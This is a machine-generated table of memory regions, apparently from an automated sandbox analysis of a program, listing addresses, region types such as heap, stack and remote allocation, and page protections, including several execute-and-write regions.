page readonly
|
||
27701FE000
|
stack
|
page read and write
|
||
8760000
|
unkown
|
page read and write
|
||
6D5000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
154D1AF3000
|
heap
|
page read and write
|
||
27AE000
|
stack
|
page read and write
|
||
7BC0000
|
unkown
|
page read and write
|
||
7BE0000
|
unkown
|
page read and write
|
||
2FCD000
|
stack
|
page read and write
|
||
154CD240000
|
trusted library section
|
page readonly
|
||
277057E000
|
unkown
|
page readonly
|
||
154CCD02000
|
heap
|
page read and write
|
||
51F6000
|
unkown
|
page read and write
|
||
8640000
|
unkown
|
page execute and read and write
|
||
8BB2000
|
unkown
|
page read and write
|
||
154CC48E000
|
heap
|
page read and write
|
||
276F277000
|
stack
|
page read and write
|
||
7E1C000
|
unkown
|
page read and write
|
||
27AF000
|
stack
|
page read and write
|
||
276F87E000
|
unkown
|
page readonly
|
||
154CD290000
|
trusted library section
|
page readonly
|
||
8660000
|
unkown
|
page read and write
|
||
154D19A0000
|
trusted library allocation
|
page read and write
|
||
33D0000
|
unkown
|
page read and write
|
||
7C10000
|
unkown
|
page read and write
|
||
33C9000
|
unkown
|
page read and write
|
||
78FC000
|
unkown
|
page read and write
|
||
4C5E000
|
unkown
|
page read and write
|
||
7240000
|
unkown
|
page write copy
|
||
7916000
|
unkown
|
page read and write
|
||
2E23000
|
unkown
|
page read and write
|
||
31A9000
|
heap
|
page read and write
|
||
154D17D0000
|
trusted library allocation
|
page read and write
|
||
7905000
|
unkown
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3040000
|
heap
|
page read and write
|
||
719E000
|
unkown
|
page read and write
|
||
154CC3C0000
|
trusted library section
|
page read and write
|
||
2E4D000
|
unkown
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
154D1AFC000
|
heap
|
page read and write
|
||
79AD000
|
unkown
|
page read and write
|
||
778F000
|
unkown
|
page read and write
|
||
6253000
|
unkown
|
page read and write
|
||
2770EFE000
|
stack
|
page read and write
|
||
7360000
|
unkown
|
page read and write
|
||
154D1AED000
|
heap
|
page read and write
|
||
870E000
|
unkown
|
page read and write
|
||
78C0000
|
unkown
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
2E3B000
|
unkown
|
page read and write
|
||
154CCC00000
|
heap
|
page read and write
|
||
624D000
|
unkown
|
page read and write
|
||
7AAE000
|
unkown
|
page read and write
|
||
154D1B0A000
|
heap
|
page read and write
|
||
154D1A41000
|
heap
|
page read and write
|
||
33C0000
|
unkown
|
page read and write
|
||
3360000
|
unkown
|
page read and write
|
||
7B6D000
|
unkown
|
page read and write
|
||
154D18C9000
|
trusted library allocation
|
page read and write
|
||
7300000
|
unkown
|
page read and write
|
||
3380000
|
unkown
|
page read and write
|
||
8563000
|
unkown
|
page execute and read and write
|
||
84F0000
|
unkown
|
page execute and read and write
|
||
8A44000
|
unkown
|
page read and write
|
||
276FF7E000
|
unkown
|
page readonly
|
||
98000
|
stack
|
page read and write
|
||
5945000
|
unkown
|
page read and write
|
||
3515000
|
heap
|
page read and write
|
||
154D1A54000
|
heap
|
page read and write
|
||
276EC9B000
|
stack
|
page read and write
|
||
154CCD13000
|
heap
|
page read and write
|
||
64E000
|
stack
|
page read and write
|
||
774E000
|
unkown
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
8920000
|
unkown
|
page read and write
|
||
8910000
|
unkown
|
page read and write
|
||
43D000
|
stack
|
page read and write
|
||
5E8000
|
heap
|
page read and write
|
||
331D000
|
unkown
|
page read and write
|
||
277017E000
|
unkown
|
page readonly
|
||
4D50000
|
heap
|
page read and write
|
||
154CC4FE000
|
heap
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
154D1C00000
|
remote allocation
|
page read and write
|
||
3770000
|
heap
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
32C1000
|
unkown
|
page readonly
|
||
6B5000
|
heap
|
page read and write
|
||
78E0000
|
unkown
|
page execute and read and write
|
||
154D1A60000
|
heap
|
page read and write
|
||
4C90000
|
heap
|
page read and write
|
||
7510000
|
unkown
|
page read and write
|
||
8D3E000
|
unkown
|
page read and write
|
||
42A000
|
unkown
|
page read and write
|
||
2550000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
7E9D000
|
unkown
|
page read and write
|
||
80C6000
|
unkown
|
page execute and read and write
|
||
610E000
|
unkown
|
page read and write
|
||
154CC43F000
|
heap
|
page read and write
|
||
87C0000
|
unkown
|
page execute and read and write
|
||
154CCD1A000
|
heap
|
page read and write
|
||
72B0000
|
unkown
|
page read and write
|
||
2770F7E000
|
unkown
|
page readonly
|
||
154CC2A0000
|
heap
|
page read and write
|
||
2E3E000
|
unkown
|
page read and write
|
||
276FEFE000
|
stack
|
page read and write
|
||
8C40000
|
unkown
|
page execute and read and write
|
||
89BC000
|
unkown
|
page read and write
|
||
154CC380000
|
heap
|
page read and write
|
||
154CD280000
|
trusted library section
|
page readonly
|
||
AD5000
|
heap
|
page read and write
|
||
154CC48C000
|
heap
|
page read and write
|
||
24F0000
|
heap
|
page read and write
|
||
854D000
|
unkown
|
page execute and read and write
|
||
408000
|
unkown
|
page readonly
|
||
33BD000
|
unkown
|
page execute and read and write
|
||
5D5000
|
heap
|
page read and write
|
||
8630000
|
unkown
|
page read and write
|
||
73B0000
|
unkown
|
page read and write
|
||
94BA000
|
unkown
|
page execute and read and write
|
||
7B80000
|
unkown
|
page execute and read and write
|
||
154CC495000
|
heap
|
page read and write
|
||
BCBA000
|
unkown
|
page execute and read and write
|
||
7D5E000
|
unkown
|
page read and write
|
||
A8BA000
|
unkown
|
page execute and read and write
|
||
5943000
|
unkown
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7D1B000
|
unkown
|
page read and write
|
||
3390000
|
unkown
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
2554000
|
heap
|
page read and write
|
||
316E000
|
unkown
|
page read and write
|
||
8730000
|
unkown
|
page execute and read and write
|
||
8D7D000
|
unkown
|
page read and write
|
There are 436 hidden memdumps, click here to show them.